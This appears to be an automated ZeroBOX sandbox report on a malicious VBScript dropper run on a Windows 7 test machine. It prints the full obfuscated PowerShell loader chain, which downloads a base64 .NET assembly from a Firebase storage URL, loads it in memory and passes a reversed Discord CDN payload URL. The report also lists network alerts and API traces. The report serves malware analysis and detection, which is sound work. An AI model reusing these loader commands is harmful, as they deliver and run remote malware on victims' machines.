Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 9, 2024, 10:45 a.m.	Aug. 9, 2024, 10:47 a.m.

Size	11.3MB
Type	Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5	`23cef0c9c3e02cc2bdc8516b889d1191`
SHA256	`16b1375e4fb1306be8f8952f0469b86eb570718c8e4a2b8633809c8e1967ebee`
CRC32	`CB89179F`
ssdeep	`1536:BPDVP1P4PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPZ:pU`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\sostener.vbs
1820
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell -command $KByHL;
  2168
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\sostener.vbs';[Byte[]] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' ));"
    2316

Name	Response	Post-Analysis Lookup
firebasestorage.googleapis.com	A 172.217.27.42 A 172.217.24.234 A 142.250.71.138 A 172.217.31.10 A 142.250.197.10 A 142.250.207.74 A 172.217.27.10 A 142.250.76.10 A 172.217.24.106 A 142.250.197.42 A 142.250.76.234 A 142.250.66.106 A 142.250.196.234 A 172.217.25.10 A 142.250.66.138 A 142.250.71.170	172.217.25.170

IP Address	Status	Action
142.250.76.234	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 142.250.76.234:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49166 142.250.76.234:443	C=US, O=Google Trust Services, CN=WR2	CN=upload.video.google.com	c4:3f:12:39:d2:ec:4c:2c:1c:0a:a6:18:8e:2a:97:2c:d8:c2:7e:af

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 10:45 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 9, 2024, 10:45 a.m.			0	0
IsDebuggerPresent Aug. 9, 2024, 10:45 a.m.			0	0

Command line console output was observed (27 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: Exception calling "DownloadString" with "1" argument(s): "The remote server ret console_handle: 0x00000023	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: urned an error: (400) Bad Request." console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: At line:1 char:168 console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: + $knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\sostener.vbs';[Byte console_handle: 0x00000047	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: []] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).Dow console_handle: 0x00000053	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: nloadString <<<< ('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.a console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: ppspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-04113 console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: 4577ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary console_handle: 0x00000077	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: 3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb console_handle: 0x00000083	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: 0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080 console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:s console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: ptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: Multiple ambiguous overloads found for "Load" and the argument count: "1". console_handle: 0x000000eb	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: At line:1 char:358 console_handle: 0x000000f7	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: + $knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\sostener.vbs';[Byte console_handle: 0x00000103	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: []] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).Dow console_handle: 0x0000010f	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: nloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot console_handle: 0x0000011b	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: .com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ff console_handle: 0x00000127	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: e'));[system.AppDomain]::CurrentDomain.Load <<<< ($fpmxy).GetType('ClassLibrary console_handle: 0x00000133	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: 3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb console_handle: 0x0000013f	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: 0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080 console_handle: 0x0000014b	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:s console_handle: 0x00000157	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: ptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' console_handle: 0x00000163	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodException console_handle: 0x0000017b	1	1
WriteConsoleW Aug. 9, 2024, 10:45 a.m.	buffer: + FullyQualifiedErrorId : MethodCountCouldNotFindBest console_handle: 0x00000187	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005933f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005931b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005931b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005931b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005931b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005931b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005931b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005937f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005937f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005937f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005937f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005937f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005937f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005937f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005937f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005937f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005937f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593d78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00593d78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e2f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e2f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e2f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052eb78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052eb78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052eb78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052eb78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052eb78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 9, 2024, 10:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052eb78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 9, 2024, 10:45 a.m.		1	1	0

Powershell script has download & invoke calls (1 event)

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/dll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Performs some HTTP requests (1 event)

request

GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/dll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 288 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02590000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0241a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02412000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02422000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0248a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02423000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02424000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02497000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0241b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02482000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02495000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
